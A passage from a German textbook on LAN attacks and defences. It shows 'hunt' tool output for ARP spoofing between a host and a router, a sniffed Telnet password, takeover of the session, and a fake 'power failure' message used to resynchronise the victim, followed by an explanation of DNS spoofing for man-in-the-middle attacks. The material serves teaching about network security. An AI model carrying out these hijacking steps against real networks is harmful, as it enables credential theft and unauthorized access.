*arps> t 0) on 10.185.208.187 is 10.185.208.114 as EA:1A:DE:AD:BE:01 refresh 0s 1) on 10.185.208.114 is 10.185.208.187 as EA:1A:DE:AD:BE:02 refresh 0s item nr. to test> 0 ARP spoof in host 10.185.208.187 - OK --- arpspoof daemon --- rcvpkt 875, free/alloc 62/64 ---Y--- s/k) start/stop relayer daemon l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return *arps> t 0) on 10.185.208.187 is 10.185.208.114 as EA:1A:DE:AD:BE:01 refresh 0s 1) on 10.185.208.114 is 10.185.208.187 as EA:1A:DE:AD:BE:02 refresh 0s item nr. to test> 1 ARP spoof in host 10.185.208.114 - OK --- arpspoof daemon --- rcvpkt 949, free/alloc 62/64 ---Y--- s/k) start/stop relayer daemon

1.4 Beispiele für verschiedene LAN-Angriffe 19 l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return ARP Cache auf dem Host und dem Router Durch die von hunt permanent gesendeten gefälschten ARP Replies wird auf den betroffenen Systemen im ARP Cache die»gespoofte«mac-adresse eingetragen. TCPIP> show arp Cnt Flags Timer Host Phys Addr 1: UCS 186 10.185.208.187 ea-1a-de-ad-be-02 router# show arp Protocol Address Age (min) Hardware Addr Type Interface Internet 10.185.208.114 0 ea1a.dead.be01 ARPA Ethernet0 Session Hijacking Nachdem der ARP Spoof Daemon gestartet ist, gehen alle Pakete, die zwischen den Rechnern 10.185.208.114 und 10.185.208.187 ausgetauscht werden, zuerst zum Angreifer. Telnet Session protokollieren --- Main Menu --- rcvpkt 1148, free/alloc 63/64 ---Y--- l/w/r) list/watch/reset connections u) host up tests a) arp/simple hijack (avoids ack storm if arp used) s) simple hijack d) daemons rst/arp/sniff/mac o) options x) exit *> l 1) 10.185.211.208 [1253] --> 10.185.208.185 [23] 2) 10.185.208.114 [49230] --> 10.185.208.187 [23] --- Main Menu --- rcvpkt 2528, free/alloc 63/64 ---Y--- l/w/r) list/watch/reset connections u) host up tests a) arp/simple hijack (avoids ack storm if arp used) s) simple hijack d) daemons rst/arp/sniff/mac o) options x) exit -> a 0) 10.185.211.208 [1253] --> 10.185.208.185 [23] 1) 10.185.208.114 [49233] --> 10.185.208.187 [23] choose conn> 1 hosts already ARP spoofed input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>

20 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen dump connectin y/n [y]> dump [s]rc/[d]st/[b]oth [b]> print src/dst same characters y/n [n]> CTRL-C to break eennaa Password: c router# Der Angreifer bekommt die komplette Telnet-Verbindung zwischen dem Host und dem Router angezeigt. Mit der Tastenkombination»CTRL C«übernimmt hunt die Telnet-Verbindung -- press any key> you took over the connection CTRL-] to break Zu diesem Zeitpunkt hat der Angreifer die Telnet- Verbindung übernommen. nixat2# show user Line User Host(s) Idle Location 0 con 0 idle 2d00h * 2 vty 0 idle 00:00:00 tagein.frs-lab.de Mit der Tastenkombination»CTRL ]«gibt hunt die Session wieder frei router# [r]eset connection/[s]ynchronize/[n]one [r]> s user have to type 16 chars and print 424 chars to synchronize connection CTRL-C to break 1234567890123456 done Synchronisation der Verbindung auf der Client-Seite Damit die Sequenznummern der Telnet-Verbindung wieder synchronisiert sind, bekommt der Anwender auf dem Client eine Meldung, um die fehlenden Zeichen einzugeben. msg from root: power failure - try to type 16 chars 1234567890123456 power failure detected... power resumed, ok 1.4.4 DNS-Spoofing-Attacke DNS Spoofing kann man in lokalen Netzen sehr gut für»man-in-the-middle«-attacken einsetzen, um verschlüsselte Verbindungen (z. B. SSH oder HTTPS) auf dem angreifenden Rechner terminieren zu lassen. Dabei beantwortet der Angreifer jeden DNS Query des Zielrechners mit einem eigenen DNS Response und trägt als Reply- Adresse seine IP-Adresse ein. Da der eigentliche DNS Response des DNS-Servers in der Regel erst nach der Antwort des angreifenden Rechners auf dem Zielsystem ankommt, wird er dort ignoriert.